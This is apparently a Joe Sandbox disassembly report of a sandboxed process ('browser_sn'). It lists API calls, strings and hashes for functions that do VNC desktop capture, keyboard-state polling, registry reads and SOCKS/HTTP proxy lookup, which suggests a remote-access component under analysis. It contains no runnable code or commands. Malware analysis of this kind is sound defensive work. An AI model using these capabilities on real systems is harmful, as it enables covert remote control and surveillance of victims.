Instruction ID: af84b2585c02d83cf6000ef1e58cd0bf0e5776e84aeed8793cbb447f9eac796f
Opcode Fuzzy Hash: da8d5682ec0159b53c6e6ac02bc9a146a6fe897d91bd88be9db6412787fbbace
Instruction Fuzzy Hash: EC110932A2898291EA71FB30F4613F9A360FF8A744FC01136DA4D467A2DE3CF554CA20

Function 00007FF790C87E10 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF790C3D390: GetModuleFileNameA.KERNEL32 ref: 00007FF790C3D3BB

GetPrivateProfileIntA.KERNEL32 ref: 00007FF790C87E50

Part of subcall function 00007FF790C87650: GetPrivateProfileIntA.KERNEL32 ref: 00007FF790C87689
Part of subcall function 00007FF790C87650: RegCreateKeyExA.ADVAPI32 ref: 00007FF790C876DD
Part of subcall function 00007FF790C87650: RegCreateKeyExA.ADVAPI32 ref: 00007FF790C87722

Part of subcall function 00007FF790C877F0: GetPrivateProfileIntA.KERNEL32 ref: 00007FF790C87840
Part of subcall function 00007FF790C877F0: RegQueryValueExA.ADVAPI32 ref: 00007FF790C8787D

Strings

UseRegistry, xrefs: 00007FF790C87E3F
locdom1, xrefs: 00007FF790C87E69, 00007FF790C87E82
admin, xrefs: 00007FF790C87E46

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: PrivateProfile$Create$FileModuleNameQueryValue
String ID: UseRegistry$admin$locdom1
API String ID: 1788981264-2648182776
Opcode ID: 90366ba7cc0c0a2881363750c1573ef4067fd92e56bfccd46d2f838935763d96
Instruction ID: d7f56fb879502e94facec5d410068b4ebbeb7f171d83f19dcd7ffaa30c16a592
Opcode Fuzzy Hash: 90366ba7cc0c0a2881363750c1573ef4067fd92e56bfccd46d2f838935763d96
Instruction Fuzzy Hash: 2E011A21A3894391FB71FB34E8913F5A2A1EF5A704FC02135D91D46792EE3CF588C620

Function 00007FF790C87EB0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF790C3D390: GetModuleFileNameA.KERNEL32 ref: 00007FF790C3D3BB

GetPrivateProfileIntA.KERNEL32 ref: 00007FF790C87EED

Part of subcall function 00007FF790C87650: GetPrivateProfileIntA.KERNEL32 ref: 00007FF790C87689
Part of subcall function 00007FF790C87650: RegCreateKeyExA.ADVAPI32 ref: 00007FF790C876DD
Part of subcall function 00007FF790C87650: RegCreateKeyExA.ADVAPI32 ref: 00007FF790C87722

Part of subcall function 00007FF790C877F0: GetPrivateProfileIntA.KERNEL32 ref: 00007FF790C87840
Part of subcall function 00007FF790C877F0: RegQueryValueExA.ADVAPI32 ref: 00007FF790C8787D

Strings

UseRegistry, xrefs: 00007FF790C87EDC
locdom2, xrefs: 00007FF790C87F06, 00007FF790C87F1F
admin, xrefs: 00007FF790C87EE3

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: PrivateProfile$Create$FileModuleNameQueryValue
String ID: UseRegistry$admin$locdom2
API String ID: 1788981264-80830018
Opcode ID: 453e7d21788d8a281cd3351b72fc90b6b80e6296ed96c2d368ba72f2aba873be
Instruction ID: f2c16a4e771f53f065996a3a96a2e132a1175a6dea4d89f7fb97aaa0866ff4d0
Opcode Fuzzy Hash: 453e7d21788d8a281cd3351b72fc90b6b80e6296ed96c2d368ba72f2aba873be
Instruction Fuzzy Hash: B5011E21A3854281FA71FB75A4953F5A3A1EF9A304FC11531DA1D46792EE3CF189C624

Function 00007FF790C5C210 Relevance: 6.0, APIs: 4, Instructions: 41fileCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32 ref: 00007FF790C5C23F
FindFirstFileA.KERNEL32 ref: 00007FF790C5C24F
SetErrorMode.KERNEL32 ref: 00007FF790C5C25A
FindClose.KERNEL32 ref: 00007FF790C5C26D

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: ErrorFindMode$CloseFileFirst
String ID:
API String ID: 2885216544-0
Opcode ID: 0223ee3f43c164e8854e7b1b386b18195b9e4c924526049b6427bad48412c67f
Instruction ID: bab2e28bf0915bcb662115c526f1a381412711421322abc098de11a5d6ff574a
Opcode Fuzzy Hash: 0223ee3f43c164e8854e7b1b386b18195b9e4c924526049b6427bad48412c67f
Instruction Fuzzy Hash: 9B012535B1878586DA309B31B8542B9E3B1FB8DBE0F805231DE6E43794CE3DE8458B10

Function 00007FF790C3BB70 Relevance: 1.5, APIs: 1, Instructions: 35networkCOMMON

Download Yara Rule

APIs

recv.WS2_32 ref: 00007FF790C3BBAF

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 1f8284c9b81bc00274cff331346e792dc04ed1df2d7324caccb88a26b9367104
Instruction ID: c2fd8f8923210c590743fe840a8b60a5dd8921aa100af33d769aa1706ded7bfd
Opcode Fuzzy Hash: 1f8284c9b81bc00274cff331346e792dc04ed1df2d7324caccb88a26b9367104
Instruction Fuzzy Hash: 0EF0FC21B38E8282E370AB3A69406B5E595EF85BE4F985231FF5943FD9DF3CE4414610

Function 00007FF790C531B0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetKeyboardState.USER32 ref: 00007FF790C531D3

Part of subcall function 00007FF790C474C0: GetKeyState.USER32 ref: 00007FF790C47509
Part of subcall function 00007FF790C474C0: GetKeyState.USER32 ref: 00007FF790C47523
Part of subcall function 00007FF790C474C0: GetKeyState.USER32 ref: 00007FF790C4753D
Part of subcall function 00007FF790C474C0: GetKeyState.USER32 ref: 00007FF790C47557
Part of subcall function 00007FF790C474C0: GetKeyState.USER32 ref: 00007FF790C47571
Part of subcall function 00007FF790C474C0: GetKeyState.USER32 ref: 00007FF790C4758B
Part of subcall function 00007FF790C474C0: TryEnterCriticalSection.KERNEL32 ref: 00007FF790C475D6
Part of subcall function 00007FF790C474C0: LeaveCriticalSection.KERNEL32 ref: 00007FF790C4760F

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: State$CriticalSection$EnterKeyboardLeave
String ID:
API String ID: 4104749118-0
Opcode ID: 0256701cad5363ec1328f5542e36a1f7f43bbe659b594c5479dffbbec42ae8d9
Instruction ID: 1e0a14d3f1543a3efc9f2665f9a3df53701ac0b53870e6cc1614d8f96ca75c31
Opcode Fuzzy Hash: 0256701cad5363ec1328f5542e36a1f7f43bbe659b594c5479dffbbec42ae8d9
Instruction Fuzzy Hash: A6F0E971A3C58041E234A732E8213F6F2A1FF8C744F844235998D056A5CF2CF558DA10

Function 00007FF790C60D40 Relevance: 45.7, APIs: 25, Strings: 1, Instructions: 239windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32 ref: 00007FF790C60D8E
PtInRect.USER32 ref: 00007FF790C60DCC
GetIconInfo.USER32 ref: 00007FF790C60E05
GetSystemMetrics.USER32 ref: 00007FF790C60E7F
GetSystemMetrics.USER32 ref: 00007FF790C60E8C
SelectObject.GDI32 ref: 00007FF790C60F37
CreateCompatibleDC.GDI32 ref: 00007FF790C60F50
CreateCompatibleDC.GDI32 ref: 00007FF790C60F60
SelectObject.GDI32 ref: 00007FF790C60F70
SelectObject.GDI32 ref: 00007FF790C60F80
BitBlt.GDI32 ref: 00007FF790C60FCD
BitBlt.GDI32 ref: 00007FF790C61017
SelectObject.GDI32 ref: 00007FF790C61027
SelectObject.GDI32 ref: 00007FF790C61033
SelectObject.GDI32 ref: 00007FF790C6103F
DeleteDC.GDI32 ref: 00007FF790C61048
DeleteDC.GDI32 ref: 00007FF790C61051
SelectObject.GDI32 ref: 00007FF790C61067
DrawIconEx.USER32 ref: 00007FF790C610AA
SelectObject.GDI32 ref: 00007FF790C610BA
DeleteObject.GDI32 ref: 00007FF790C610C9
DeleteObject.GDI32 ref: 00007FF790C610D8
GdiFlush.GDI32 ref: 00007FF790C610FE
DeleteObject.GDI32 ref: 00007FF790C611B9
DeleteObject.GDI32 ref: 00007FF790C611CC

Strings

F, xrefs: 00007FF790C60FF1

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: Object$Select$Delete$CompatibleCreateIconMetricsSystem$CursorDrawFlushInfoRect
String ID: F
API String ID: 2202639625-1304234792
Opcode ID: b79674502bec6eb6e9178b59d754768edd22f48091c48e79f06fd71b0c89d9c2
Instruction ID: d7da9c201f36ef401f52af5a3748648a93e23cb0e4a9df6b860f82f9bf3262e0
Opcode Fuzzy Hash: b79674502bec6eb6e9178b59d754768edd22f48091c48e79f06fd71b0c89d9c2
Instruction Fuzzy Hash: 51C13A36A14A968AE7A0DF75D6489AEB3BDFF49744F810436EE0943714DF78E844CB20

Function 00007FF790C5EBF0 Relevance: 38.7, APIs: 14, Strings: 8, Instructions: 242sleepCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32 ref: 00007FF790C5EC60
Sleep.KERNEL32 ref: 00007FF790C5EC6B
SetEvent.KERNEL32 ref: 00007FF790C5ECA2
CloseHandle.KERNEL32 ref: 00007FF790C5EE83
CloseHandle.KERNEL32 ref: 00007FF790C5EE99
FreeLibrary.KERNEL32 ref: 00007FF790C5EE5F

Part of subcall function 00007FF790C63170: PostThreadMessageA.USER32 ref: 00007FF790C631B6
Part of subcall function 00007FF790C63170: WaitForSingleObject.KERNEL32 ref: 00007FF790C631C8
Part of subcall function 00007FF790C63170: TerminateThread.KERNEL32 ref: 00007FF790C631F3
Part of subcall function 00007FF790C63170: CloseHandle.KERNEL32 ref: 00007FF790C63200

ReleaseDC.USER32 ref: 00007FF790C5EED3
DeleteDC.GDI32 ref: 00007FF790C5EEF9
DeleteObject.GDI32 ref: 00007FF790C5EF0D
free.LIBCMT ref: 00007FF790C5EF1A
DeleteCriticalSection.KERNEL32 ref: 00007FF790C5EF27
DeleteCriticalSection.KERNEL32 ref: 00007FF790C5EF35
DeleteObject.GDI32 ref: 00007FF790C5EF93
free.LIBCMT ref: 00007FF790C5EFA0

Strings

vncdesktop.cpp : ~vncDesktop m_lGridsList.clear, xrefs: 00007FF790C5EE00
vncdesktop.cpp : failed to DeleteDC hrootdc, xrefs: 00007FF790C5EEDD
vncdesktop.cpp : ~vncDesktop Shutdown(), xrefs: 00007FF790C5ED38
vncdesktop.cpp : ~vncDesktop , xrefs: 00007FF790C5EC0F
vncdesktop.cpp : Desktop thread running, force close , xrefs: 00007FF790C5EC83
vncdesktop.cpp : ~vncDesktop:: second request to close InitWindowthread, xrefs: 00007FF790C5EEA8
2, xrefs: 00007FF790C5EC73
vncdesktop.cpp : delete ((RGBPixelList) , xrefs: 00007FF790C5EDD7

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: Delete$CloseHandleObject$CriticalEventSectionThreadfree$FreeLibraryMessagePostReleaseSingleSleepTerminateWait
String ID: 2$vncdesktop.cpp : Desktop thread running, force close $vncdesktop.cpp : delete ((RGBPixelList) $vncdesktop.cpp : failed to DeleteDC hrootdc$vncdesktop.cpp : ~vncDesktop $vncdesktop.cpp : ~vncDesktop Shutdown()$vncdesktop.cpp : ~vncDesktop m_lGridsList.clear$vncdesktop.cpp : ~vncDesktop:: second request to close InitWindowthread
API String ID: 2560957196-1231019345
Opcode ID: 7b40948f3f8d59fae7a34cd2d6a5b2514468978ae6bf0d8a194a99cecfe53d32
Instruction ID: 473a8212815393e3ba2e4deebf53220438f9f03d69c38c0e9d4629f216fcaaf1
Opcode Fuzzy Hash: 7b40948f3f8d59fae7a34cd2d6a5b2514468978ae6bf0d8a194a99cecfe53d32
Instruction Fuzzy Hash: EDB16A26A28A8285EB34EF75D8441F9A764FF82B84F845032DA0E577A5CF3CF545E360

Function 00007FF790CFDC9C Relevance: 38.6, APIs: 16, Strings: 6, Instructions: 136libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,00007FF790CE8C19,?,?,?,00007FF790CE748C), ref: 00007FF790CFDCE1
GetProcAddress.KERNEL32(?,00007FF790CE8C19,?,?,?,00007FF790CE748C), ref: 00007FF790CFDCFD
EncodePointer.KERNEL32(?,00007FF790CE8C19,?,?,?,00007FF790CE748C), ref: 00007FF790CFDD0F
GetProcAddress.KERNEL32(?,00007FF790CE8C19,?,?,?,00007FF790CE748C), ref: 00007FF790CFDD26
EncodePointer.KERNEL32(?,00007FF790CE8C19,?,?,?,00007FF790CE748C), ref: 00007FF790CFDD2F
GetProcAddress.KERNEL32(?,00007FF790CE8C19,?,?,?,00007FF790CE748C), ref: 00007FF790CFDD46
EncodePointer.KERNEL32(?,00007FF790CE8C19,?,?,?,00007FF790CE748C), ref: 00007FF790CFDD4F
GetProcAddress.KERNEL32(?,00007FF790CE8C19,?,?,?,00007FF790CE748C), ref: 00007FF790CFDD66
EncodePointer.KERNEL32(?,00007FF790CE8C19,?,?,?,00007FF790CE748C), ref: 00007FF790CFDD6F
GetProcAddress.KERNEL32(?,00007FF790CE8C19,?,?,?,00007FF790CE748C), ref: 00007FF790CFDD8E
EncodePointer.KERNEL32(?,00007FF790CE8C19,?,?,?,00007FF790CE748C), ref: 00007FF790CFDD97
DecodePointer.KERNEL32(?,00007FF790CE8C19,?,?,?,00007FF790CE748C), ref: 00007FF790CFDDCA
DecodePointer.KERNEL32(?,00007FF790CE8C19,?,?,?,00007FF790CE748C), ref: 00007FF790CFDDDA
DecodePointer.KERNEL32(?,00007FF790CE8C19,?,?,?,00007FF790CE748C), ref: 00007FF790CFDE30
DecodePointer.KERNEL32(?,00007FF790CE8C19,?,?,?,00007FF790CE748C), ref: 00007FF790CFDE51
DecodePointer.KERNEL32(?,00007FF790CE8C19,?,?,?,00007FF790CE748C), ref: 00007FF790CFDE6B

Strings

GetUserObjectInformationW, xrefs: 00007FF790CFDD55
USER32.DLL, xrefs: 00007FF790CFDCDA
GetProcessWindowStation, xrefs: 00007FF790CFDD84
MessageBoxW, xrefs: 00007FF790CFDCF3
GetActiveWindow, xrefs: 00007FF790CFDD15
GetLastActivePopup, xrefs: 00007FF790CFDD35

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: Pointer$AddressDecodeEncodeProc$LibraryLoad
String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationW$MessageBoxW$USER32.DLL
API String ID: 2643518689-564504941
Opcode ID: 3f01601e3236801bc7f61e640a5cdc001557def2435a7818b715a9f11b20129c
Instruction ID: c95777df4f1fcbb516f4f626ea0edddaedf3f27f2906de93e282e08681bf3d1e
Opcode Fuzzy Hash: 3f01601e3236801bc7f61e640a5cdc001557def2435a7818b715a9f11b20129c
Instruction Fuzzy Hash: 5D51DB20E3AB0385E975BB36A8695B4E2B1BF56B95FC42039DD0E47790EE3CF4458221

Function 00007FF790C40430 Relevance: 36.2, APIs: 24, Instructions: 202COMMON

Download Yara Rule

APIs

GetRgnBox.GDI32 ref: 00007FF790C40473
CreateRectRgn.GDI32 ref: 00007FF790C404BC
CombineRgn.GDI32 ref: 00007FF790C404D9
OffsetRgn.GDI32 ref: 00007FF790C404EE
GetRgnBox.GDI32 ref: 00007FF790C4050D
GetRgnBox.GDI32 ref: 00007FF790C40524
GetRgnBox.GDI32 ref: 00007FF790C40532
DeleteObject.GDI32 ref: 00007FF790C406F1
free.LIBCMT ref: 00007FF790C406FB
DeleteObject.GDI32 ref: 00007FF790C40704
free.LIBCMT ref: 00007FF790C4070E
DeleteObject.GDI32 ref: 00007FF790C40716
free.LIBCMT ref: 00007FF790C40720

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: DeleteObjectfree$CombineCreateOffsetRect
String ID:
API String ID: 960235054-0
Opcode ID: ac153f7d938eb301090265389bc7675e5ea949dc37f539b25424fdb8fde9d8de
Instruction ID: e253994c791bca21a7ef00aa90fee36356edc4caf3414a3b49ef91be5cf73838
Opcode Fuzzy Hash: ac153f7d938eb301090265389bc7675e5ea949dc37f539b25424fdb8fde9d8de
Instruction Fuzzy Hash: F5911B36B24A4296EB20EB72E4546ADB371FB89B88F808031DE4E57B65DF38F505C710

Function 00007FF790C3B550 Relevance: 35.2, APIs: 12, Strings: 8, Instructions: 227COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF790C3B030: _wgetenv.LIBCMT ref: 00007FF790C3B05E
Part of subcall function 00007FF790C3B030: _wgetenv.LIBCMT ref: 00007FF790C3B08C
Part of subcall function 00007FF790C3B030: _wgetenv.LIBCMT ref: 00007FF790C3B0DC
Part of subcall function 00007FF790C3B030: inet_ntoa.WS2_32 ref: 00007FF790C3B1C8

inet_ntoa.WS2_32 ref: 00007FF790C3B5B8
free.LIBCMT ref: 00007FF790C3B5D4
_wgetenv.LIBCMT ref: 00007FF790C3B682
free.LIBCMT ref: 00007FF790C3B5CC

Part of subcall function 00007FF790CE8BF4: RtlFreeHeap.NTDLL(?,?,?,00007FF790CE748C), ref: 00007FF790CE8C0A
Part of subcall function 00007FF790CE8BF4: _errno.LIBCMT ref: 00007FF790CE8C14
Part of subcall function 00007FF790CE8BF4: GetLastError.KERNEL32(?,?,?,00007FF790CE748C), ref: 00007FF790CE8C1C

inet_ntoa.WS2_32 ref: 00007FF790C3B59C

Part of subcall function 00007FF790CE92A4: malloc.LIBCMT ref: 00007FF790CE92C7

_wgetenv.LIBCMT ref: 00007FF790C3B60D
_wgetenv.LIBCMT ref: 00007FF790C3B665
_wgetenv.LIBCMT ref: 00007FF790C3B6B0
_wgetenv.LIBCMT ref: 00007FF790C3B701
_wgetenv.LIBCMT ref: 00007FF790C3B738
_wgetenv.LIBCMT ref: 00007FF790C3B766
free.LIBCMT ref: 00007FF790C3B893

Strings

SOCKS5_SERVER, xrefs: 00007FF790C3B65E, 00007FF790C3B672
SOCKS_SERVER, xrefs: 00007FF790C3B6A9, 00007FF790C3B6BD
SOCKS5_RESOLVE, xrefs: 00007FF790C3B6FA, 00007FF790C3B70E
SOCKS_RESOLVE, xrefs: 00007FF790C3B75F, 00007FF790C3B773
http://, xrefs: 00007FF790C3B7BE
SOCKS4_SERVER, xrefs: 00007FF790C3B67B, 00007FF790C3B68F
SOCKS4_RESOLVE, xrefs: 00007FF790C3B731, 00007FF790C3B745
HTTP_PROXY, xrefs: 00007FF790C3B606, 00007FF790C3B61A

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

